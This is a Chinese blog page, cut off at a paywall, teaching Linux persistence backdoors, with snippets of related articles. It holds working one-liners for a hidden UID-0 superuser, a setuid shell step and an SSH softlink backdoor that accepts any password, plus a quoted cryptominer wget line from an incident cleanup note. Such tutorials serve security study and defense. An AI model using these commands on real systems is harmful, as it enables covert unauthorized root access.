Linux持续化后门

最新推荐文章于 2024-05-07 08:31:17 发布
最新推荐文章于 2024-05-07 08:31:17 发布
阅读量3.3k 收藏
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_Z_W_/article/details/104406505
版权
本文介绍了在Linux环境中维持权限和植入隐蔽后门的方法,包括创建超级用户、使用bash脚本创建远控后门、SSH公钥免密、ICMP后门以及SSH软链接后门。此外,还提到了清除这些后门的策略,如检查启动项、查找未知进程、过滤ICMP包和维护iptables规则。
摘要由CSDN通过智能技术生成

Linux权限维持

环境:Centos7、Kali虚拟机等

 

1、增加超级用户

useradd -p `openssl passwd -1 -salt 'salt' 123456` test -o -u 0 -g root -G root -s /bin/bash -d /home/test

通过命令创建了test 123456的超级用户

 

2、unix bash远控后门

先创建/etc/...脚本文件

授予权限chmod +sx /etc/...

修改

最低0.47元/天 解锁文章
小晓晓晓林
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux常见的持久后门汇总1
08-03
Linux常见的持久后门汇总】 在网络安全领域,一旦攻击者成功侵入系统,他们会寻找方法保持对系统的长期访问,这就涉及到了持久后门Linux系统因其开源和广泛使用,成为了攻击者的重要目标。本篇文章主要介绍...
linux持久
HoAd'blog
08-25 1319
linux持久后门添加超级用户SUID shellalias 后门inetdcrontab后门ssh公钥免密ssh软连接SSH wrapper后门PAM隐身登录隐藏文件Git hooksPROMPT_COMMAND后门PROMPT_COMMAND提权Sudoers “trick”TCP Wrappers进程注入其他一些小技巧bash去掉history记录修改上传文件时间戳伪造Apache日志中的指定IPLinux日志清除 添加超级用户 echo "user:x:0:0::/:/bin/sh" >&g
12.3、后渗透测试--持久后门
无痕的博客
12-13 2276
metasploit后渗透测试--持久后门
持久后门crontab
黄都伟
07-06 805
服务器遇到了挖矿程序,wget --quiet http://m247.ltd:36663/.xmrig/0 -O- crontab计划任务导致了该告警的产生。crontab是Linux操作系统中常用的计划任务服务,黑客或恶意程序常常会通过添加修改cron任务使恶意程序定时重复启动,保持驻留。 1.vim /etc/crontab 找到这条命令删除并保存。 2.使用crontab -l 查看,crontab -e进入编辑页面,输入dd,删除, :wq! 保存退出 ...
持久:利用Linux PAM创建后门
qq_68163788的博客
02-19 1430
PAM(Pluggable Authentication Modules)是Linux系统中用于身份验证的模块框架。通过利用PAM,可以创建一个后门来绕过系统的认证机制,从而获得未经授权的访问权限。 要创建一个后门,首先需要编写一个自定义的PAM模块,该模块可以在用户登录时执行特定的操作,例如绕过密码验证或者添加一个额外的认证方式。接着,将这个自定义的PAM模块加载到系统中,并配置PAM以在用户登录时使用该模块。 通过这种方式,攻击者可以在系统中创建一个隐藏的后门,同时绕过正常的认证流程,
linux 持久后门
luguifang2011的专栏
01-18 3120
前言 收集复现下网上linux后门姿势,一起学习下。 这张图特别好 添加超级用户 某些情况下是没有回显的,可以用一句话直接添加用户 1、useradd guest;echo 'guest:123456'|chpasswd 2、useradd -p `openssl passwd 123456` guest 3、useradd -p "$(openssl passwd 12...
检测Linux下的VFS型内核后门软件.pdf
09-07
这对于提升Linux系统的安全性,防止机密信息泄露和系统被持续控制具有重要意义。 总的来说,面对日益复杂的网络安全威胁,我们需要不断更新和改进检测技术,以应对如VFS型内核后门软件这样的新型攻击。对Linux内核...
嵌入式Linux系统及应用实现.pdf
09-07
3. 实用且生命力强:与试验型操作系统不同,Linux是一个持续发展的实用操作系统。 嵌入式系统则强调以下几个关键特点: 1. 固态存储:软件通常直接存储在内存芯片或单片机中,以提高执行速度和系统可靠性。 2. 高...
外汇管理网上核销系统选择Linux.pdf
09-06
同时,Linux社区持续更新的安全补丁和强大的防火墙支持,有助于抵御各种网络攻击,保护外汇管理数据的安全。 再者,Linux的开源生态环境为系统开发提供了丰富的工具和资源。开发人员可以利用开源库和框架,快速构建...
桌面Linux在国内日常办公应用的前景探析.pdf
09-06
2. 可靠的系统安全:Linux 系统因其开源特性,能有效防止“后门”和恶意软件,为用户提供了一个相对更安全的环境。开源社区的协作使得系统漏洞能得到快速发现和修复,提高了系统的整体安全性。 此外,Linux 支持跨...
Linux权限维持—OpenSSH&PAM后门&SSH软连接&公私钥登录
剁椒鱼头没剁椒的博客
08-22 2859
由于密码日志文件是被隐藏的,所以可以直接使用cat去查看,这里只要管理者使用ssh进行连接就会记录密码,而这些操作都是无感的,当然若管理员会去定期排查,那么该被发现还是会被发现的,这些都是基于管理员不会定期去排查才能够持久。这里要注意一个问题就是,不一定编译就能够成功,有时候根本无法编辑,从网上找的很多资料中,都跳过直接给命令,所以这里我就提前说一下,不一定能够编译成功,不成功再次重新测试,若还是不行,就拉到吧。这里重启也可能存在问题,这个实验有时候很莫名其妙的,有时候能够测试成功,有时候测试是不成功的。
ssh后门介绍与防御
有勇气的牛排博客
08-04 1531
文章目录1 介绍2 实战演练2.1 查看版本2.2 下载SSH配置文件2.3 安装2.4 修改后门密码and文件记录2.5 编译安装2.6 摸出痕迹3 防御ssh后门 1 介绍 当拿到root权限后,一般需要维持权限(留后门),可以做openssh后门,也就是root双密码,管理员一个密码,我们的后门一个密码。 2 实战演练 实验环境:Centos7 2.1 查看版本 ssh -v 可以对ssh备份配置文件,可以对后期的文件时间进行修改 cp -p /etc/ssh/ssh_config / etc/
倒反天罡的ssh后门Linux 后门系列
jijisaq的博客
04-08 1640
今天看见有安全研究员发了一篇 ssh 后门的文章,复现思考后分享给大家。
通过SSH留后门(创建ssh软链接)
songling515010475的专栏
05-10 2222
一、判断sshd_config配置中的UsePAM参数是否为yes cat /etc/ssh/sshd_config 二、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。 三、通过命令创建后门软链接,通过查看端口己监听。 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345 netstat -antlp 四、通过另一台机器ssh进行任意密码登
【安全研究】Linux后渗透常见后门驻留方式分析
weixin_49128886的博客
11-09 1394
Linux后渗透常见后门驻留方式分析
ssh软连接后门
weixin_60719780的博客
05-23 554
软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中会去PAM配置文件中寻找是否存在对应名称的配置信息(su),su在pam_rootok只检测uid 0 即认证成功,导致可以使用任意密码去登录。
linux 简单ssh后门,Linux软连接ssh后门之我见
weixin_39682897的博客
05-12 961
0x00 前言学习了Sevck发表Linux软连接后门的《一条命令引发的思考》,还是存在几个疑惑点,仔细探究之后就有了这篇文章0x01简单回顾一、Linux经典软连接后门命令1.在被控制端执行:ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=12345建立sshd的软连接2.本地客户端执行:ssh [emailprotected] -p 12345接着输...
常见的几种Windows后门持久方式
qq284489030的博客
05-09 2050
0×0 背景 持久后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久方式方便以后排查问题使用。 0×1 注册表自启动 最常见的在指定键值添加一个新的键值类型为REG_SZ,数据项中添写需要运行程序的路径即可以启动,此类操作一些较为敏感容易被本地AV...
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
05-07 3091
Rootkit 是网络犯罪分子用来控制目标计算机或网络的软件。Rootkit 有时可以显示为单个软件,但通常由一系列工具组成,这些工具允许黑客对目标设备进行管理员级控制。黑客通过多种方式在目标计算机上安装 Rootkit:最常见的是通过网络钓鱼或其他类型的社会工程攻击。受害者在不知不觉中下载并安装隐藏在计算机上运行的其他进程中的恶意软件,并让黑客控制操作系统的几乎所有方面。另一种方法是利用漏洞(即软件或未更新的操作系统中的弱点)并将 Rootkit 强制安装到计算机上。
linux 自动测试
08-24
对于Linux环境下的自动测试,有几种常用的工具和技术可以使用。 1. Shell脚本:Linux系统自带的Shell脚本语言可以用于编写简单的自动测试脚本。你可以使用Shell脚本调用命令行工具、执行测试命令、验证输出等。这种方式简单易用,适合于一些简单的测试任务。 2. Python:Python是一种流行的脚本语言,也是进行自动测试的常用选择。Python拥有丰富的库和工具,可以进行各种测试任务,例如使用unittest或pytest框架编写测试脚本,使用selenium或requests库进行Web自动测试,使用paramiko库进行SSH连接测试等。 3. Jenkins:Jenkins是一个流行的开源持续集成和持续交付工具,也可以用于自动测试。你可以在Jenkins上配置和管理自动测试任务,设置定期运行测试脚本,并生成测试报告。Jenkins提供了丰富的插件和集成选项,使得整个自动测试过程更加灵活和可控。 4. Ansible:Ansible是一个自动运维工具,也可以用于自动测试。通过Ansible,你可以编写测试任务的Playbook,描述测试环境的配置和准备工作,并执行测试任务。Ansible具有强大的扩展性和可重用性,可以与其他工具和服务集成,实现全面的自动测试流程。 以上是一些常见的Linux自动测试工具和技术,具体选择取决于你的需求和项目要求。希望对你有所帮助!如果你对其他方面还有疑问,可以继续提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值